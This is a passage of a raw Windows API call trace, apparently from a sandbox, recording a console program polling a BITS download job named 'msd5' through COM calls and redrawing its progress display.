[0073.040] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20f358 | out: ppvObject=0x20f358*=0x0) returned 0x80004002
[0073.040] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20f30c | out: ppvObject=0x20f30c*=0x390cb0) returned 0x0
[0073.040] IUnknown:AddRef (This=0x390cb0) returned 0x3
[0073.040] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20f26c | out: ppvObject=0x20f26c*=0x0) returned 0x80004002
[0073.040] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x390dc4 | out: ppvObject=0x390dc4*=0x0) returned 0x80004002
[0073.040] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x20f274 | out: ppvObject=0x20f274*=0x0) returned 0x80004002
[0073.040] IUnknown:Release (This=0x390cb0) returned 0x2
[0073.042] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x381978*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x20e77c | out: ppvObject=0x20e77c*=0x0) returned 0x80004002
[0073.043] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x381978*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x20e77c | out: ppvObject=0x20e77c*=0x390cb0) returned 0x0
[0073.043] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x381978*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x388300 | out: ppvObject=0x388300*=0x390cb0) returned 0x0
[0073.045] IBackgroundCopyJob:Resume (This=0x37a624) returned 0x0
[0073.047] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0073.047] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0073.047] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x20f890 | out: lpMode=0x20f890) returned 1
[0073.051] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0073.051] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x20f8d0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0073.051] PeekMessageW (in: lpMsg=0x20f8a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f8a8) returned 1
[0073.051] TranslateMessage (lpMsg=0x20f8a8) returned 0
[0073.051] DispatchMessageW (lpMsg=0x20f8a8) returned 0x1
[0073.051] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x20f404 | out: ppvObject=0x20f404*=0x0) returned 0x80004002
[0073.051] IBackgroundCopyCallback:JobModification (This=0x390cb0, pJob=0x37a6b4, dwReserved=0x0) returned 0x0
[0073.051] IBackgroundCopyJob:GetState (in: This=0x37a624, pVal=0x390cbc | out: pVal=0x390cbc) returned 0x0
[0073.051] IBackgroundCopyCallback:JobModification (This=0x390cb0, pJob=0x37a6b4, dwReserved=0x0) returned 0x0
[0073.051] IBackgroundCopyJob:GetState (in: This=0x37a624, pVal=0x390cbc | out: pVal=0x390cbc) returned 0x0
[0073.081] IBackgroundCopyJob:GetType (in: This=0x37a624, pVal=0x20df68 | out: pVal=0x20df68) returned 0x0
[0073.081] IBackgroundCopyJob:GetProgress (in: This=0x37a624, pVal=0x390cc0 | out: pVal=0x390cc0) returned 0x0
[0073.082] IBackgroundCopyJob:GetPriority (in: This=0x37a624, pVal=0x20df64 | out: pVal=0x20df64) returned 0x0
[0073.083] CoTaskMemFree (pv=0x0)
[0073.083] IBackgroundCopyJob:GetDisplayName (in: This=0x37a624, pVal=0x20df7c | out: pVal=0x20df7c*="msd5") returned 0x0
[0073.084] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df24 | out: lpConsoleScreenBufferInfo=0x20df24) returned 1
[0073.084] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x20df3c | out: lpNumberOfCharsWritten=0x20df3c) returned 1
[0073.084] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x20df3c | out: lpNumberOfAttrsWritten=0x20df3c) returned 1
[0073.084] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0073.085] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.085] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df10 | out: lpConsoleScreenBufferInfo=0x20df10) returned 1
[0073.085] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20df28, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df28*=0xa) returned 1
[0073.085] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.086] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df0c | out: lpConsoleScreenBufferInfo=0x20df0c) returned 1
[0073.086] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20df24, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df24*=0x5) returned 1
[0073.086] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.086] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df14 | out: lpConsoleScreenBufferInfo=0x20df14) returned 1
[0073.086] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x20df2c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df2c*=0x7) returned 1
[0073.087] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.087] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df08 | out: lpConsoleScreenBufferInfo=0x20df08) returned 1
[0073.087] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20df20, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df20*=0x8) returned 1
[0073.087] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.087] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df10 | out: lpConsoleScreenBufferInfo=0x20df10) returned 1
[0073.087] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20df28, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df28*=0x8) returned 1
[0073.088] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.088] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df04 | out: lpConsoleScreenBufferInfo=0x20df04) returned 1
[0073.088] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x20df1c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df1c*=0xc) returned 1
[0073.088] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.088] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df14 | out: lpConsoleScreenBufferInfo=0x20df14) returned 1
[0073.088] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20df2c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df2c*=0xa) returned 1
[0073.089] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.089] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20defc | out: lpConsoleScreenBufferInfo=0x20defc) returned 1
[0073.089] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20df14, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df14*=0xa) returned 1
[0073.089] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.089] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df04 | out: lpConsoleScreenBufferInfo=0x20df04) returned 1
[0073.089] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20df1c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df1c*=0x8) returned 1
[0073.090] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.090] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20df28 | out: _Buffer="0") returned 1
[0073.090] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20df34 | out: _Buffer="1") returned 1
[0073.090] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df04 | out: lpConsoleScreenBufferInfo=0x20df04) returned 1
[0073.090] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20df1c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df1c*=0x5) returned 1
[0073.090] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.090] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df0c | out: lpConsoleScreenBufferInfo=0x20df0c) returned 1
[0073.091] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20df24, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df24*=0x8) returned 1
[0073.091] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.091] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20df30 | out: _Buffer="0") returned 1
[0073.091] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20df24 | out: lpSystemTimeAsFileTime=0x20df24*(dwLowDateTime=0xdc2c6b70, dwHighDateTime=0x1d469c7))
[0073.091] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20df1c | out: lpSystemTimeAsFileTime=0x20df1c*(dwLowDateTime=0xdc2c6b70, dwHighDateTime=0x1d469c7))
[0073.091] _finite (_X=0x0) returned 0
[0073.091] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20dedc | out: lpConsoleScreenBufferInfo=0x20dedc) returned 1
[0073.091] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x20def4, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20def4*=0xd) returned 1
[0073.092] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.092] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20dee8 | out: lpConsoleScreenBufferInfo=0x20dee8) returned 1
[0073.092] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x20df00, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df00*=0xf) returned 1
[0073.092] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.092] _vsnwprintf (in: _Buffer=0x20dd14, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x20dcd8 | out: _Buffer="0.00 B/S") returned 8
[0073.092] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df2c | out: lpConsoleScreenBufferInfo=0x20df2c) returned 1
[0073.093] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20df44, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20df44*=0x8) returned 1
[0073.093] CoTaskMemFree (pv=0x388398)
[0073.093] IBackgroundCopyJob:GetType (in: This=0x37a624, pVal=0x20ef70 | out: pVal=0x20ef70) returned 0x0
[0073.094] IBackgroundCopyJob:GetProgress (in: This=0x37a624, pVal=0x390cc0 | out: pVal=0x390cc0) returned 0x0
[0073.095] IBackgroundCopyJob:GetPriority (in: This=0x37a624, pVal=0x20ef6c | out: pVal=0x20ef6c) returned 0x0
[0073.095] CoTaskMemFree (pv=0x0)
[0073.095] IBackgroundCopyJob:GetDisplayName (in: This=0x37a624, pVal=0x20ef84 | out: pVal=0x20ef84*="msd5") returned 0x0
[0073.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef2c | out: lpConsoleScreenBufferInfo=0x20ef2c) returned 1
[0073.096] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x20ef44 | out: lpNumberOfCharsWritten=0x20ef44) returned 1
[0073.096] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x20ef44 | out: lpNumberOfAttrsWritten=0x20ef44) returned 1
[0073.096] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0073.097] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef18 | out: lpConsoleScreenBufferInfo=0x20ef18) returned 1
[0073.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef30, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef30*=0xa) returned 1
[0073.097] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef14 | out: lpConsoleScreenBufferInfo=0x20ef14) returned 1
[0073.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20ef2c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef2c*=0x5) returned 1
[0073.098] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef1c | out: lpConsoleScreenBufferInfo=0x20ef1c) returned 1
[0073.098] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x20ef34, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef34*=0x7) returned 1
[0073.098] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef10 | out: lpConsoleScreenBufferInfo=0x20ef10) returned 1
[0073.099] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef28, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef28*=0x8) returned 1
[0073.099] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef18 | out: lpConsoleScreenBufferInfo=0x20ef18) returned 1
[0073.099] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef30, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef30*=0x8) returned 1
[0073.099] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef0c | out: lpConsoleScreenBufferInfo=0x20ef0c) returned 1
[0073.100] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x20ef24, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef24*=0xc) returned 1
[0073.100] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.100] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef1c | out: lpConsoleScreenBufferInfo=0x20ef1c) returned 1
[0073.100] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef34, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef34*=0xa) returned 1
[0073.100] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.100] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef04 | out: lpConsoleScreenBufferInfo=0x20ef04) returned 1
[0073.100] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef1c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef1c*=0xa) returned 1
[0073.101] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef0c | out: lpConsoleScreenBufferInfo=0x20ef0c) returned 1
[0073.101] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef24, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef24*=0x8) returned 1
[0073.101] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.101] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef30 | out: _Buffer="0") returned 1
[0073.101] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef3c | out: _Buffer="1") returned 1
[0073.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef0c | out: lpConsoleScreenBufferInfo=0x20ef0c) returned 1
[0073.102] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20ef24, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef24*=0x5) returned 1
[0073.102] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef14 | out: lpConsoleScreenBufferInfo=0x20ef14) returned 1
[0073.102] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef2c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef2c*=0x8) returned 1
[0073.102] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.102] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef38 | out: _Buffer="0") returned 1
[0073.102] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ef24 | out: lpSystemTimeAsFileTime=0x20ef24*(dwLowDateTime=0xdc2eccd0, dwHighDateTime=0x1d469c7))
[0073.102] _finite (_X=0x0) returned 1
[0073.102] _finite (_X=0x0) returned 1
[0073.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eee4 | out: lpConsoleScreenBufferInfo=0x20eee4) returned 1
[0073.103] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x20eefc, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20eefc*=0xd) returned 1
[0073.103] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eef0 | out: lpConsoleScreenBufferInfo=0x20eef0) returned 1
[0073.103] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x20ef08, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef08*=0xf) returned 1
[0073.103] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.104] _vsnwprintf (in: _Buffer=0x20ed1c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x20ece0 | out: _Buffer="0.00 B/S") returned 8
[0073.104] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef34 | out: lpConsoleScreenBufferInfo=0x20ef34) returned 1
[0073.104] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef4c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef4c*=0x8) returned 1
[0073.104] CoTaskMemFree (pv=0x388398)
[0073.105] PeekMessageW (in: lpMsg=0x20f8a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f8a8) returned 0
[0073.105] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x20f8d0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0073.302] PeekMessageW (in: lpMsg=0x20f8a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f8a8) returned 1
[0073.303] TranslateMessage (lpMsg=0x20f8a8) returned 0
[0073.303] DispatchMessageW (lpMsg=0x20f8a8) returned 0x1
[0073.303] IBackgroundCopyCallback:JobModification (This=0x390cb0, pJob=0x37a6b4, dwReserved=0x0) returned 0x0
[0073.303] IBackgroundCopyJob:GetState (in: This=0x37a624, pVal=0x390cbc | out: pVal=0x390cbc) returned 0x0
[0073.303] IBackgroundCopyCallback:JobModification (This=0x390cb0, pJob=0x37a6b4, dwReserved=0x0) returned 0x0
[0073.303] IBackgroundCopyJob:GetState (in: This=0x37a624, pVal=0x390cbc | out: pVal=0x390cbc) returned 0x0
[0073.304] IBackgroundCopyJob:GetType (in: This=0x37a624, pVal=0x20ded8 | out: pVal=0x20ded8) returned 0x0
[0073.305] IBackgroundCopyJob:GetProgress (in: This=0x37a624, pVal=0x390cc0 | out: pVal=0x390cc0) returned 0x0
[0073.305] IBackgroundCopyJob:GetPriority (in: This=0x37a624, pVal=0x20ded4 | out: pVal=0x20ded4) returned 0x0
[0073.306] CoTaskMemFree (pv=0x0)
[0073.306] IBackgroundCopyJob:GetDisplayName (in: This=0x37a624, pVal=0x20deec | out: pVal=0x20deec*="msd5") returned 0x0
[0073.307] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de94 | out: lpConsoleScreenBufferInfo=0x20de94) returned 1
[0073.307] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x20deac | out: lpNumberOfCharsWritten=0x20deac) returned 1
[0073.307] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x20deac | out: lpNumberOfAttrsWritten=0x20deac) returned 1
[0073.308] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0073.308] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.308] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de80 | out: lpConsoleScreenBufferInfo=0x20de80) returned 1
[0073.308] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20de98, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de98*=0xa) returned 1
[0073.309] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.309] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de7c | out: lpConsoleScreenBufferInfo=0x20de7c) returned 1
[0073.309] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20de94, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de94*=0x5) returned 1
[0073.309] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.309] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de84 | out: lpConsoleScreenBufferInfo=0x20de84) returned 1
[0073.310] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x20de9c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de9c*=0x7) returned 1
[0073.310] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.310] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de78 | out: lpConsoleScreenBufferInfo=0x20de78) returned 1
